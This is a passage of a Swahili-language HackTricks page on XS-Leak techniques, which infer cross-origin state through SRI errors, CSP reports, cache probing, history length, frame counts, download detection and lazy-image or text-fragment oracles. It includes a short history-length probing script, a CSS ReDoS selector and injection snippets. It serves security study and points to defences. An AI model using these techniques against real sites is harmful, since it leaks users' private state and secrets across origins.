Muhusika anaweza kudukua ujumbe mrefu wa kosa kudhanua ukubwa wa majibu ya mwelekeo wa msalaba. Hii inawezekana kutokana na mfumo wa Uadilifu wa Rasilimali ya Kijalidi (SRI), ambao hutumia sifa ya uadilifu kuthibitisha kuwa rasilimali zilizopakuliwa, mara nyingi kutoka kwa CDNs, hazijabadilishwa. Ili SRI ifanye kazi kwenye rasilimali za mwelekeo wa msalaba, hizi lazima ziwe zilizoruhusiwa na CORS; vinginevyo, hazitahusishwa na ukaguzi wa uadilifu. Katika Madai ya Usalama (SA), kama kosa la XS-Leak la CORS, ujumbe wa kosa unaweza kukamatwa baada ya ombi la kupakua na sifa ya uadilifu kushindwa. Wadukuzi wanaweza kusudi kuzua kosa hili kwa kutoa thamani bandia ya hash kwa sifa ya uadilifu ya ombi lolote. Katika SA, ujumbe wa kosa unaofuatia kwa bahati mbaya unafunua urefu wa yaliyomo kwenye rasilimali iliyotakiwa. Kuvuja kwa habari hii inamwezesha muhusika kutambua tofauti katika ukubwa wa majibu, ikifungua njia kwa mashambulizi ya XS-Leak yenye utata.

Uvunjaji/Deteksheni wa CSP

XS-Leak inaweza kutumia CSP kugundua ikiwa tovuti ya mwelekeo wa msalaba ilielekezwa kwa asili tofauti. Kuvuja hii inaweza kugundua mwelekeo, lakini kwa kuongezea, kikoa cha lengo la mwelekeo kinavuja. Wazo msingi la shambulio hili ni kuruhusu kikoa cha lengo kwenye tovuti ya muhusika. Mara ombi linapotolewa kwa kikoa cha lengo, inageuzwa kuelekea kikoa cha mwelekeo wa msalaba. CSP inazuia ufikiaji wake na kuunda ripoti ya uvunjaji inayotumiwa kama mbinu ya kuvuja. Kulingana na kivinjari, ripoti hii inaweza kufichua mahali pa kikomo cha mwelekeo.
Vivinjari vya kisasa havitaonyesha URL ilielekezwa kwenda, lakini bado unaweza kugundua kwamba mwelekeo wa msalaba ulisababishwa.

Akiba

Vivinjari vinaweza kutumia akiba moja ya pamoja kwa tovuti zote. Bila kujali asili yao, inawezekana kudai ikiwa ukurasa wa lengo umetaka faili maalum.

Ikiwa ukurasa unapakia picha tu ikiwa mtumiaji ameingia, unaweza kufuta rasilimali (hivyo haipo tena kwenye akiba ikiwa ilikuwepo, angalia viungo vya maelezo zaidi), fanya ombi ambalo lingeweza kupakia rasilimali hiyo na jaribu kupakia rasilimali kwa ombi baya (k.m. kutumia kichwa cha kurejelea kirefu). Ikiwa upakiaji wa rasilimali haukusababisha kosa lolote, ni kwa sababu ilikuwa imehifadhiwa.

Mwongozo wa CSP

Kipengele kipya katika Google Chrome (GC) inaruhusu kurasa za wavuti kupendekeza Sera ya Usalama wa Yaliyomo (CSP) kwa kuweka sifa kwenye kipengele cha fremu, na maelekezo ya sera yanatumwa pamoja na ombi la HTTP. Kawaida, yaliyomo yaliyowekwa lazima idhinishe hii kupitia kichwa cha HTTP, au ukurasa wa kosa utaonyeshwa. Walakini, ikiwa fremu tayari inatawaliwa na CSP na sera mpya iliyopendekezwa sio ngumu zaidi, ukurasa utapakia kawaida. Mbinu hii inafungua njia kwa muhusika kugundua maelekezo maalum ya CSP ya ukurasa wa mwelekeo wa msalaba kwa kutambua ukurasa wa kosa. Ingawa udhaifu huu ulitambuliwa kama umetatuliwa, ugunduzi wetu unaonyesha mbinu mpya ya kuvuja inayoweza kugundua ukurasa wa kosa, ikionyesha kuwa tatizo lililokuwepo halijatatuliwa kabisa.

CORP

Kichwa cha CORP ni kipengele cha usalama cha jukwaa la wavuti lenye umri mdogo ambacho wakati kimeanzishwa kinazuia maombi ya mwelekeo wa msalaba ya no-cors kwa rasilimali iliyotolewa. Uwepo wa kichwa hicho unaweza kugunduliwa, kwa sababu rasilimali iliyolindwa na CORP itatoa kosa wakati inapopakuliwa.

CORB

Angalia kiungo kwa maelezo zaidi kuhusu shambulio.

Hitilafu ya CORS kwenye Mipangilio Mibaya ya Kutafakari Asili

Katika kesi ambapo kichwa cha Asili kinarejeshwa lakini jina la kichwa Access-Control-Allow-Origin linatumika, mchomaji anaweza kutumia tabia hii kujaribu kupata rasilimali katika hali ya CORS. Ikiwa hitilafu haikutolewa, inamaanisha kwamba ilikuwa imepatikana kwa usahihi kutoka kwenye wavuti, ikiwa hitilafu inatokea, ni kwa sababu ilikuwa imefikiwa kutoka kwenye cache (hitilafu inaonekana kwa sababu cache inahifadhi jibu lenye kichwa cha CORS kuruhusu kikoa cha awali na sio kikoa cha mchomaji).
Tafadhali kumbuka kwamba ikiwa asili hairejeshwi lakini alama ya joker inatumika (Access-Control-Allow-Origin: *) hii haitafanya kazi.

Mbinu ya Atributi Inayoweza Kusomwa

Ufikiaji wa Upya wa Fetch

Kwa kutuma ombi kwa kutumia API ya Fetch na redirect: "manual" na vigezo vingine, inawezekana kusoma sifa ya response.type na ikiwa ni sawa na opaqueredirect basi jibu lilikuwa upya.

COOP

Mchomaji anaweza kudokeza uwepo wa kichwa cha Sera ya Kufungua Msingi wa Asili (COOP) katika jibu la HTTP la asili tofauti. COOP hutumiwa na programu za wavuti kuzuia tovuti za nje kupata marejeleo ya dirisha yoyote. Uonekano wa kichwa hiki unaweza kugunduliwa kwa kujaribu kupata marejeleo ya contentWindow. Katika hali ambapo COOP inatumika kwa hiari, mali ya opener inakuwa ishara ya wazi: ni isiyofafanuliwa wakati COOP inatumika, na imefafanuliwa ikiwa haipo.

Urefu Mdogo wa URL - Upande wa Seva

Ikiwa upya wa upande wa seva unatumia mipangilio ya mtumiaji ndani ya upya na data ziada. Inawezekana kugundua tabia hii kwa sababu kawaida seva ina kikomo cha urefu wa ombi. Ikiwa data ya mtumiaji ni urefu huo - 1, kwa sababu upya unatumia data hiyo na kuongeza kitu ziada, itasababisha kosa linaloweza kugundulika kupitia Matukio ya Kosa.

Ikiwa kwa namna fulani unaweza kuweka vidakuzi kwa mtumiaji, unaweza pia kufanya shambulio hili kwa kuweka vidakuzi vya kutosha (bomu la kuki) ili kwa ukubwa ulioongezeka wa majibu sahihi kosa litasababishwa. Katika kesi hii, kumbuka kwamba ukianzisha ombi hili kutoka kwenye tovuti ile ile, <script> itatuma vidakuzi kiotomatiki (hivyo unaweza kuchunguza makosa).
Mfano wa bomu la kuki + XS-Search unaweza kupatikana katika suluhisho lililokusudiwa la andiko hili: https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended

SameSite=None au kuwa katika muktadha sawa kawaida inahitajika kwa aina hii ya shambulio.

Urefu Mdogo wa URL - Upande wa Mteja

Kulingana na hati ya Chromium, Urefu wa URL wa Chrome ni 2MB.

Kwa ujumla, jukwaa la wavuti halina mipaka ya urefu wa URL (ingawa 2^31 ni kikomo cha kawaida). Chrome inazuia URL hadi urefu wa 2MB kwa sababu za vitendo na kuepuka kusababisha matatizo ya kukataa huduma katika mawasiliano ya mchakato kwa mchakato.

Kwa hivyo ikiwa URL ya upya inajibu ni kubwa katika moja ya kesi, inawezekana kuifanya iwekeze upya na URL kubwa kuliko 2MB ili kugonga kikomo cha urefu. Wakati hii inatokea, Chrome inaonyesha ukurasa wa about:blank#blocked.

Tofauti inayoweza kugundulika, ni kwamba ikiwa upya ulikamilika, window.origin itatoa kosa kwa sababu asili tofauti haiwezi kupata habari hiyo. Walakini, ikiwa kikomo kilipigwa na ukurasa uliopakiwa ulikuwa about:blank#blocked asili ya dirisha origin inabaki ile ile ya mzazi, ambayo ni habari inayopatikana.

Maelezo yote ya ziada yanayohitajika kufikia 2MB yanaweza kuongezwa kupitia hash katika URL ya awali ili itumike katika upya.

{% content-ref url="url-max-length-client-side.md" %} url-max-length-client-side.md {% endcontent-ref %}

Mipokezi ya Mwisho

Ikiwa idadi kubwa ya upokezi wa kufuata wa kivinjari ni 20, mshambuliaji anaweza kujaribu kupakia ukurasa wake na upokezi 19 na hatimaye kumtuma mhanga kwenye ukurasa uliojaribiwa. Ikiwa kosa linazinduliwa, basi ukurasa ulikuwa unajaribu kumwongoza mhanga.

Urefu wa Historia

API ya Historia inaruhusu msimbo wa JavaScript kubadilisha historia ya kivinjari, ambayo inaokoa kurasa zilizotembelewa na mtumiaji. Mshambuliaji anaweza kutumia mali ya urefu kama njia ya kuingiza: kugundua upelelezi wa JavaScript na HTML.
Kukagua history.length, kufanya mtumiaji atembee kwenye ukurasa, uibadilishe kurudi kwa asili ile ile na kukagua thamani mpya ya history.length.

Urefu wa Historia na URL sawa

  • Njia za Kuingiza: Fremu, Pop-ups
  • Tofauti Inayoweza Kugundulika: Ikiwa URL ni ile ile kama ile iliyoguiliwa
  • Muhtasari: Inawezekana kudhani ikiwa eneo la fremu/pop-up liko kwenye URL maalum kwa kutumia vibaya urefu wa historia.
  • Mfano wa Msimbo: Chini

Mshambuliaji anaweza kutumia msimbo wa JavaScript kubadilisha eneo la fremu/pop-up hadi moja iliyoguiliwa na mara moja kuibadilisha kuwa about:blank. Ikiwa urefu wa historia uliongezeka inamaanisha URL ilikuwa sahihi na ilikuwa na muda wa kuongezeka kwa sababu URL haijapakiwa upya ikiwa ni ile ile. Ikiwa haukuongezeka inamaanisha ilijaribu kupakia URL iliyoguiliwa lakini kwa sababu tulibadilisha mara moja na kupakia about:blank, urefu wa historia haukuongezeka kamwe wakati wa kupakia URL iliyoguiliwa.

async function debug(win, url) {
win.location = url + '#aaa';
win.location = 'about:blank';
await new Promise(r => setTimeout(r, 500));
return win.history.length;
}

win = window.open("https://example.com/?a=b");
await new Promise(r => setTimeout(r, 2000));
console.log(await debug(win, "https://example.com/?a=c"));

win.close();
win = window.open("https://example.com/?a=b");
await new Promise(r => setTimeout(r, 2000));
console.log(await debug(win, "https://example.com/?a=b"));

Hesabu ya Fremu

Kuhesabu idadi ya fremu kwenye wavuti iliyofunguliwa kupitia iframe au window.open inaweza kusaidia kutambua hali ya mtumiaji kwenye ukurasa huo.
Zaidi ya hayo, ikiwa ukurasa una idadi ile ile ya fremu daima, kuangalia kwa mfululizo idadi ya fremu kunaweza kusaidia kutambua mfano ambao unaweza kufichua habari.

Mfano wa mbinu hii ni kwamba kwenye chrome, PDF inaweza kugunduliwa kwa kutumia hesabu ya fremu kwa sababu embed hutumiwa ndani. Kuna Parameta za URL Zilizofunguliwa ambazo huruhusu udhibiti fulani juu ya yaliyomo kama vile zoom, view, page, toolbar ambapo mbinu hii inaweza kuwa ya kuvutia.

HTMLElements

Ufichuaji wa habari kupitia vipengele vya HTML ni wasiwasi katika usalama wa wavuti, haswa wakati faili za media za kudumu zinazalishwa kulingana na habari ya mtumiaji, au wakati alama za maji zinaongezwa, kubadilisha saizi ya media. Hii inaweza kutumiwa na wachambuzi kuwatofautisha kati ya hali zinazowezekana kwa kuchambua habari inayofichuliwa na vipengele fulani vya HTML.

Habari Inayofichuliwa na Vipengele vya HTML

  • HTMLMediaElement: Kipengele hiki kinaonyesha muda na wakati uliobaki, ambao unaweza kupatikana kupitia API yake. Soma zaidi kuhusu HTMLMediaElement
  • HTMLVideoElement: Inafichua videoHeight na videoWidth. Katika vivinjari fulani, mali za ziada kama vile webkitVideoDecodedByteCount, webkitAudioDecodedByteCount, na webkitDecodedFrameCount zinapatikana, zikitoa habari zaidi kuhusu yaliyomo kwenye media. Soma zaidi kuhusu HTMLVideoElement
  • getVideoPlaybackQuality(): Kazi hii hutoa maelezo kuhusu ubora wa kucheza video, ikiwa ni pamoja na totalVideoFrames, ambayo inaweza kuonyesha kiasi cha data ya video iliyosindika. Soma zaidi kuhusu getVideoPlaybackQuality()
  • HTMLImageElement: Kipengele hiki hufichua urefu na upana wa picha. Walakini, ikiwa picha ni batili, mali hizi zitarudi 0, na kazi ya image.decode() itakataliwa, ikionyesha kushindwa kwa kupakia picha vizuri. Soma zaidi kuhusu HTMLImageElement

Mali ya CSS

Maombi ya wavuti yanaweza kubadilisha mtindo wa wavuti kulingana na hali ya mtumiaji. Faili za CSS za msingi zinaweza kuingizwa kwenye ukurasa wa mshambuliaji na kipengele cha kiungo cha HTML, na kanuni zita tekelezwa kwenye ukurasa wa mshambuliaji. Ikiwa ukurasa unabadilisha kanuni hizi kwa kudai, mshambuliaji anaweza kugundua tofauti hizi kulingana na hali ya mtumiaji.
Kama mbinu ya kuvuja, mshambuliaji anaweza kutumia mbinu ya window.getComputedStyle kusoma mali za CSS za kipengele maalum cha HTML. Kama matokeo, mshambuliaji anaweza kusoma mali za CSS za kupindukia ikiwa kipengele kilichoathiriwa na jina la mali kinajulikana.

Historia ya CSS

{% hint style="info" %} Kulingana na hii, hii haifanyi kazi katika Chrome isiyo na kichwa. {% endhint %}

Mchaguo wa CSS :visited hutumiwa kuweka mitindo tofauti kwa URL ikiwa tayari imepitiwa na mtumiaji. Zamani, mbinu ya getComputedStyle() ingeweza kutumika kutambua tofauti hizi za mtindo. Walakini, vivinjari vya kisasa vimechukua hatua za usalama kuzuia mbinu hii kutofichua hali ya kiungo. Hatua hizi ni pamoja na kurudisha mtindo uliohesabiwa kila wakati kana kwamba kiungo kimepitiwa na kuzuia mitindo inayoweza kutumika na mchaguo wa :visited.

Licha ya vizuizi hivi, inawezekana kutambua hali ya kiungo kilichopitiwa kwa njia isiyo ya moja kwa moja. Mbinu moja inahusisha kudanganya mtumiaji kuingiliana na eneo lililoathiriwa na CSS, haswa kutumia mali ya mix-blend-mode. Mali hii inaruhusu kuchanganya vipengele na mandharinyuma yake, ikifunua hali ya kupitiwa kulingana na uingiliano wa mtumiaji.

Zaidi ya hayo, ugunduzi unaweza kufikiwa bila uingiliano wa mtumiaji kwa kutumia nyakati za uchoraji wa viungo. Kwa kuwa vivinjari vinaweza kuchora viungo vilivyopitiwa na visivyopitiwa kwa njia tofauti, hii inaweza kuleta tofauti ya wakati inayoweza kupimika katika uchoraji. Uthibitisho wa dhana (PoC) ulitajwa katika ripoti ya kosa la Chromium, ukionyesha mbinu hii kwa kutumia viungo vingi kuongeza tofauti ya wakati, hivyo kufanya hali ya kupitiwa iweze kutambulika kupitia uchambuzi wa wakati.

Kwa maelezo zaidi kuhusu mali na mbinu hizi, tembelea kurasa zao za nyaraka:

Mwongozo wa X-Frame Leak

Katika Chrome, ikiwa ukurasa una kichwa cha X-Frame-Options kilichowekwa kama "deny" au "same-origin" unazingizwa kama kitu, ukurasa wa kosa unaonekana. Chrome kwa kipekee hurudisha kitu cha nyaraka tupu (badala ya null) kwa mali ya contentDocument ya kitu hiki, tofauti na iframes au vivinjari vingine. Wachomaji wanaweza kutumia hili kwa kugundua nyaraka tupu, hivyo kufichua taarifa kuhusu hali ya mtumiaji, hasa ikiwa watengenezaji hawaweki kichwa cha X-Frame-Options kwa usahihi, mara nyingi wakipuuza kurasa za kosa. Uelewa na matumizi thabiti ya vichwa vya usalama ni muhimu kuzuia uvujaji kama huo.

Uchunguzi wa Upakuaji

Kichwa cha Content-Disposition, hasa Content-Disposition: attachment, kinaagiza kivinjari kupakua maudhui badala ya kuyaonyesha moja kwa moja. Tabia hii inaweza kutumiwa kugundua ikiwa mtumiaji ana ufikio wa ukurasa unaosababisha upakuaji wa faili. Katika vivinjari vinavyotegemea Chromium, kuna njia kadhaa za kugundua tabia hii ya upakuaji:

  1. Ufuatiliaji wa Mstari wa Upakuaji:
  • Wakati faili inapopakuliwa katika vivinjari vinavyotegemea Chromium, mstari wa upakuaji unaonekana chini ya dirisha la kivinjari.
  • Kwa kufuatilia mabadiliko katika urefu wa dirisha, wachomaji wanaweza kudokeza kuonekana kwa mstari wa upakuaji, ikionyesha kwamba upakuaji umeanzishwa.
  1. Ufuatiliaji wa Navigesheni na Iframes:
  • Wakati ukurasa unazindua upakuaji wa faili kwa kutumia kichwa cha Content-Disposition: attachment, hii haileti tukio la navigesheni.
  • Kwa kupakia maudhui katika iframe na kufuatilia matukio ya navigesheni, inawezekana kuthibitisha ikiwa mwenendo wa maudhui unasababisha upakuaji wa faili (hakuna navigesheni) au la.
  1. Ufuatiliaji wa Navigesheni bila Iframes:
  • Kama njia ya iframe, njia hii inahusisha kutumia window.open badala ya iframe.
  • Kufuatilia matukio ya navigesheni katika dirisha lililofunguliwa hivi karibuni kunaweza kufichua ikiwa upakuaji wa faili ulianzishwa (hakuna navigesheni) au ikiwa maudhui yanaonyeshwa moja kwa moja (navigesheni inatokea).

Katika mazingira ambapo watumiaji walioingia tu wanaweza kuanzisha upakuaji kama huo, njia hizi zinaweza kutumika kufikiria hali ya uthibitisho wa mtumiaji kulingana na jibu la kivinjari kwa ombi la upakuaji.

Kupuuza Hifadhi ya HTTP Iliyogawanyika

{% hint style="warning" %} Hii ndio sababu hii mbinu ni ya kuvutia: Chrome sasa ina ugawanyaji wa hifadhi, na ufunguo wa hifadhi ya ukurasa uliofunguliwa hivi karibuni ni: (https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m =xxx), lakini ikiwa ninafungua ukurasa wa ngrok na kutumia fetch ndani yake, ufunguo wa hifadhi utakuwa: (https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx), ufunguo wa hifadhi ni tofauti, hivyo hifadhi haiwezi kushirikiwa. Unaweza kupata maelezo zaidi hapa: Kupata usalama na faragha kwa kugawanya hifadhi
(Maoni kutoka hapa) {% endhint %}

Ikiwa tovuti mfano.com inajumuisha rasilimali kutoka *.mfano.com/rasilimali basi rasilimali hiyo itakuwa na ufunguo wa hifadhi sawa kama rasilimali ingalombwa moja kwa moja kupitia navigesheni ya kiwango cha juu. Hii ni kwa sababu ufunguo wa hifadhi unajumuisha eTLD+1 ya kiwango cha juu na fremu ya eTLD+1.

Kwa kuwa kupata hifadhi ni haraka kuliko kupakia rasilimali, inawezekana kujaribu kubadilisha mahali pa ukurasa na kufuta baada ya muda wa 20ms (kwa mfano). Ikiwa asili imebadilika baada ya kusitisha, inamaanisha rasilimali ilihifadhiwa.
Au unaweza tu tuma ombi la fetch kwenye ukurasa uliohifadhiwa na kupima muda unavyochukua.

Uelekezaji wa Kibinafsi

Fetch na AbortController

Tumia fetch na setTimeout pamoja na AbortController kugundua ikiwa rasilimali imehifadhiwa na kufuta rasilimali fulani kutoka kwenye hifadhi ya kivinjari. Zaidi ya hayo, mchakato huu unatokea bila kuhifadhi maudhui mapya.

Uchafuzi wa Scripti

Wafanyikazi wa Huduma

Katika hali iliyotolewa, mkaidi anachukua hatua ya kujiandikisha mfanyikazi wa huduma ndani ya moja ya uwanja wao, kwa usahihi "mkaidi.com". Kisha, mkaidi anaifungua dirisha jipya kwenye wavuti ya lengo kutoka kwa hati kuu na kuagiza mfanyikazi wa huduma kuanza kipima muda. Wakati dirisha jipya linapoanza kupakia, mkaidi anaviga kumbukumbu iliyopatikana hatua ya awali kwenye ukurasa unaoongozwa na mfanyikazi wa huduma.

Baada ya kupokea ombi lililoanzishwa hatua iliyotangulia, mfanyikazi wa huduma hujibu na msimbo wa hali wa 204 (Hakuna Yaliyomo), ikimaliza kwa ufanisi mchakato wa urambazaji. Wakati huu, mfanyikazi wa huduma huchukua kipimo kutoka kwenye kipima muda kilichoanzishwa mapema katika hatua ya pili. Kipimo hiki kinaathiriwa na urefu wa JavaScript unaosababisha kuchelewesha katika mchakato wa urambazaji.

{% hint style="warning" %} Katika utekelezaji wa muda, inawezekana kufuta faktori za mtandao ili kupata vipimo sahihi zaidi. Kwa mfano, kwa kupakia rasilimali zinazotumiwa na ukurasa kabla ya kuzipakia. {% endhint %}

Kupima Kupakia

Kupima Muda kati ya Madirisha


Tumia Trickest kujenga na kutumia kiotomatiki mchakato wa kazi ulioendeshwa na zana za jamii za juu zaidi duniani.
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Kwa Kutumia HTML au Kuingiza Upya

Hapa unaweza kupata njia za kutoa taarifa kutoka kwa HTML ya msalaba-mwanzo kwa kuingiza yaliyomo ya HTML. Njia hizi ni muhimu katika hali ambapo kwa sababu yoyote unaweza kuingiza HTML lakini huwezi kuingiza kanuni za JS.

Alama Isiyotegemewa

{% content-ref url="../dangling-markup-html-scriptless-injection/" %} dangling-markup-html-scriptless-injection {% endcontent-ref %}

Upakiaji wa Picha kwa Uvivu

Ikiwa unahitaji kutoa yaliyomo na unaweza kuongeza HTML kabla ya siri unapaswa kuangalia njia za kawaida za alama isiyotegemewa.
Hata hivyo, ikiwa kwa sababu yoyote LAZIMA ufanye hivyo herufi kwa herufi (labda mawasiliano ni kupitia hitilafu ya cache) unaweza kutumia hila hii.

Picha katika HTML ina sifa ya "upakiaji" ambayo thamani yake inaweza kuwa "uvivu". Katika kesi hiyo, picha itapakia wakati inapoonekana na sio wakati ukurasa unapakia:

<img src=/something loading=lazy >

Kwa hivyo, unachoweza kufanya ni kuongeza herufi nyingi za taka (Kwa mfano maelfu ya "W"s) ili kujaza ukurasa wa wavuti kabla ya siri au kuongeza kitu kama <br><canvas height="1850px"></canvas><br>.
Kisha kama kwa mfano uchomaji wetu unaonekana kabla ya bendera, picha itakuwa imepakia, lakini ikiwa inaonekana baada ya bendera, bendera + taka itazuia kupakia (utahitaji kucheza na kiasi cha taka kuweka). Hii ndio ilifanyika katika hii andishi.

Chaguo lingine lingekuwa kutumia scroll-to-text-fragment ikiwa inaruhusiwa:

Scroll-to-text-fragment

Walakini, unaweza kufanya bot ufikie ukurasa na kitu kama

#:~:text=SECR

Kwa hivyo ukurasa wa wavuti utakuwa kama: https://victim.com/post.html#:~:text=SECR

Ambapo post.html ina vichar vya mshambuliaji na picha ya mzigo wa uvivu kisha siri ya bot inaongezwa.

Kazi ya maandishi haya ni kufanya bot kufikia maandishi yoyote kwenye ukurasa ambao una maandishi SECR. Kwa kuwa maandishi hayo ni siri na iko chini ya picha, picha itaingia tu ikiwa siri iliyoguiliwa ni sahihi. Hivyo hapo unayo orakili yako ya kuchukua siri herufi kwa herufi.

Mfano wa nambari ya kudanganya hii: https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e

Wakati wa Kupakia Picha kwa Uvivu

Ikiwa haiwezekani kupakia picha ya nje ambayo inaweza kuashiria mshambuliaji kwamba picha imepakia, chaguo lingine litakuwa kujaribu kuguess herufi mara kadhaa na kupima hilo. Ikiwa picha imepakia maombi yote yangechukua muda mrefu kuliko ikiwa picha haipaki. Hii ndio iliyotumiwa katika ufumbuzi wa andiko hili imefupishwa hapa:

{% content-ref url="event-loop-blocking-+-lazy-images.md" %} event-loop-blocking-+-lazy-images.md {% endcontent-ref %}

ReDoS

{% content-ref url="../regular-expression-denial-of-service-redos.md" %} regular-expression-denial-of-service-redos.md {% endcontent-ref %}

CSS ReDoS

Ikiwa jQuery(location.hash) inatumika, ni rahisi kugundua kupitia wakati ikiwa baadhi ya maudhui ya HTML yapo, hii ni kwa sababu ikiwa chaguzi main[id='site-main'] hazilingani, haitahitaji kuangalia sehemu nyingine za chaguzi:

$("*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) main[id='site-main']")

Uingizaji wa CSS

{% content-ref url="css-injection/" %} css-injection {% endcontent-ref %}

Ulinzi

Kuna njia za kupunguza hatari zilizopendekezwa katika https://xsinator.com/paper.pdf pia katika kila sehemu ya wiki https://xsleaks.dev/. Tazama hapo kwa maelezo zaidi kuhusu jinsi ya kulinda dhidi ya mbinu hizi.

Marejeo

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:


Tumia Trickest kujenga na kutumia kiotomatiki mifumo ya kazi inayotumia zana za jamii za juu zaidi duniani.
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}